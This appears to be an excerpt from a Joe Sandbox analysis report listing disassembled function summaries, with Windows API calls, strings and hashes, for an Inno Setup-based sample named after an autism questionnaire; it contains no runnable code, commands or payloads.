                                                                                              Function 0040E0D4, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,0041CF90,?,?), ref: 0040E0F1
                                                                                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040E102
                                                                                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041CF90,?,?), ref: 0040E202
                                                                                              • FindClose.KERNEL32(?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E214
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E220
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E265
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                              • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                              • API String ID: 1930782624-3908791685
                                                                                              • Opcode ID: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                                                              • Instruction ID: 85f15f90104044dde56611b048d4fe37091be9da2e2d426f5e1dee482ffdf80d
                                                                                              • Opcode Fuzzy Hash: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                                                              • Instruction Fuzzy Hash: 09418471E005189BCB10DAA6CC85ADEB3B9EF44310F1449FAD504F72C1EB789E568F89
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0060F6D8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0060F707
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F72E
                                                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F733
                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0060F744
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                              • String ID: SeShutdownPrivilege
                                                                                              • API String ID: 107509674-3733053543
                                                                                              • Opcode ID: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
                                                                                              • Instruction ID: 06ed2f01938c74524bf5f5b14376f39d724559be6214a1270456cb597724f4e2
                                                                                              • Opcode Fuzzy Hash: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
                                                                                              • Instruction Fuzzy Hash: 8EF090306E430276E624AF719C47FEB218D9B40B09F50092DF644D61C1DBA9E589826B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006A68B0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsIconic.USER32(?), ref: 006A6913
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 006A6930
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 006A6955
                                                                                                • Part of subcall function 005ABC0C: IsWindow.USER32(8B565300), ref: 005ABC1A
                                                                                                • Part of subcall function 005ABC0C: EnableWindow.USER32(8B565300,000000FF), ref: 005ABC29
                                                                                              • GetActiveWindow.USER32 ref: 006A6A34
                                                                                              • SetActiveWindow.USER32(00000005,006A6A9E,006A6AB4,?,?,000000EC,?,000000F0,00000000,006A6ACD,?,00000000,?,00000000), ref: 006A6A87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ActiveLong$EnableIconic
                                                                                              • String ID: `
                                                                                              • API String ID: 4222481217-2679148245
                                                                                              • Opcode ID: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
                                                                                              • Instruction ID: 936cf99dd23b6ce25ef8ab77046748165037aff960be166beb91cb3f54ae6a19
                                                                                              • Opcode Fuzzy Hash: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
                                                                                              • Instruction Fuzzy Hash: C3611875A002099FDB00EFA9C885A9EBBF6FB4A304F598469F914EB361D734AD41CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006B8DE4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A,?,00000000,00000000,00000000), ref: 006B8E35
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 006B8EB8
                                                                                              • FindNextFileW.KERNEL32(000000FF,?,00000000,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8ED0
                                                                                              • FindClose.KERNEL32(000000FF,006B8EFB,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8EEE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$AttributesCloseFirstNext
                                                                                              • String ID: isRS-$isRS-???.tmp
                                                                                              • API String ID: 134685335-3422211394
                                                                                              • Opcode ID: 564da655028b6ed245dcf1fd0bed3210c4fc5dfb2d076a09498ef35282640a75
                                                                                              • Instruction ID: d39c6702953267373b2098697dd7c4daff6c19a754f4e73b98016d5d2bb0ed42
                                                                                              • Opcode Fuzzy Hash: 564da655028b6ed245dcf1fd0bed3210c4fc5dfb2d076a09498ef35282640a75
                                                                                              • Instruction Fuzzy Hash: E6317670A006189FDB10DF65DC45ADEB7BEEB84304F5145FAE804A3291EB389E81CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C90B4, Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsIconic.USER32(?), ref: 005C90F9
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 005C9116
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 005C913B
                                                                                              • GetActiveWindow.USER32 ref: 005C9149
                                                                                              • MessageBoxW.USER32(00000000,00000000,?,000000E5), ref: 005C9176
                                                                                              • SetActiveWindow.USER32(00000000,005C91A4,?,000000EC,?,000000F0,?,00000000,005C91DA,?,?,00000000), ref: 005C9197
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ActiveLong$IconicMessage
                                                                                              • String ID:
                                                                                              • API String ID: 1633107849-0
                                                                                              • Opcode ID: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
                                                                                              • Instruction ID: 0eaebbc0e28104152e09dfddf635ce6469108de93c670a6b66e2a7222b47ea08
                                                                                              • Opcode Fuzzy Hash: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
                                                                                              • Instruction Fuzzy Hash: 4F319375A04605AFDB00EFA9DD4AF9A7BF9FB89350B1544A9F400D73A1DB34AD00DB14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0062CFB8, Relevance: 3.1, APIs: 2, Instructions: 52comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFD5
                                                                                              • CoCreateInstance.OLE32(006CD0C4,00000000,00000001,006CD0D4,00000000,00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstanceVersion
                                                                                              • String ID:
                                                                                              • API String ID: 1462612201-0
                                                                                              • Opcode ID: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                                                              • Instruction ID: 9475dfad4fa877b1df6a840545b6a6068a8d92e7f1f871649489f85859f50de3
                                                                                              • Opcode Fuzzy Hash: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                                                              • Instruction Fuzzy Hash: F511D231648A04AFEB10EF69ED4AF5A77EEEB45308F4214BAF400D7AA1C775AD10CB15
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C8B3C, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 005C8B49
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(00000000,000000FF,00000000,00000000,00000001,00000001), ref: 005C8B59
                                                                                                • Part of subcall function 00413E90: CreateMutexW.KERNEL32(?,00000001,00000000,?,006B91D7,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000), ref: 00413EA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DescriptorSecurity$CreateDaclInitializeMutex
                                                                                              • String ID:
                                                                                              • API String ID: 3525989157-0
                                                                                              • Opcode ID: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
                                                                                              • Instruction ID: 330012b0c6753e8d8900aa9d7e53afb48d76169d5e03c13c529c7fe63a2e2798
                                                                                              • Opcode Fuzzy Hash: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
                                                                                              • Instruction Fuzzy Hash: E9E092B16443006FE700DFB58C86F9B77DC9B84725F104A2EB664DB2C1E778DA48879A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006B9138, Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 260COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000,?,006B99DE,00000000,006B99E8,?,00000000), ref: 006B91BF
                                                                                              • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000), ref: 006B91E5
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 006B9206
                                                                                              • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000), ref: 006B921B
                                                                                                • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                                                              • String ID: (\m$.lst$.msg$/REG$/REGU$<`m$Inno-Setup-RegSvr-Mutex$Setup
                                                                                              • API String ID: 66301061-906243933
                                                                                              • Opcode ID: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
                                                                                              • Instruction ID: 4d26cb6eac5053f9cdac576eea358071a92945d2d4b93ba07426bed60c59251a
                                                                                              • Opcode Fuzzy Hash: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
                                                                                              • Instruction Fuzzy Hash: 9B91D5B0A042059FDB10EBA4D856FEEBBF6FB49304F514469F600A7381DA79AD81CB74
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00625D14, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(?), ref: 00625D4B
                                                                                              • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00625D67
                                                                                              • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00625D75
                                                                                              • GetExitCodeProcess.KERNEL32 ref: 00625D86
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DCD
                                                                                              • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DE9
                                                                                              Strings
                                                                                              • Stopping 64-bit helper process. (PID: %u), xrefs: 00625D3D
                                                                                              • Helper process exited with failure code: 0x%x, xrefs: 00625DB3
                                                                                              • Helper process exited, but failed to get exit code., xrefs: 00625DBF
                                                                                              • Helper isn't responding; killing it., xrefs: 00625D57
                                                                                              • Helper process exited., xrefs: 00625D95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                              • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                              • API String ID: 3355656108-1243109208
                                                                                              • Opcode ID: 8d6c89499cf1bf81312fa230767d1d7ef722e42560ff29e95753671f007f5a00
                                                                                              • Instruction ID: d564c8b30f574b505304bc0216fad519ef2dd9895e072bde183416e8b9fa8f35
                                                                                              • Opcode Fuzzy Hash: 8d6c89499cf1bf81312fa230767d1d7ef722e42560ff29e95753671f007f5a00
                                                                                              • Instruction Fuzzy Hash: 9C21AF70604F50AAD330EB78E44578BBBE69F08310F048C2DB59BC7682D734E8808B5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006B740C, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 145fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0060D3B4: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                                                                • Part of subcall function 0060D3B4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                                                              • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,006B75FA), ref: 006B748F
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,006B75FA), ref: 006B74B6
                                                                                              • SetWindowLongW.USER32 ref: 006B74F0
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?,00000000), ref: 006B7525
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 006B7599
                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000), ref: 006B75A7
                                                                                                • Part of subcall function 0060D8B0: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                                                              • DestroyWindow.USER32(?,006B75CA,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?), ref: 006B75BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
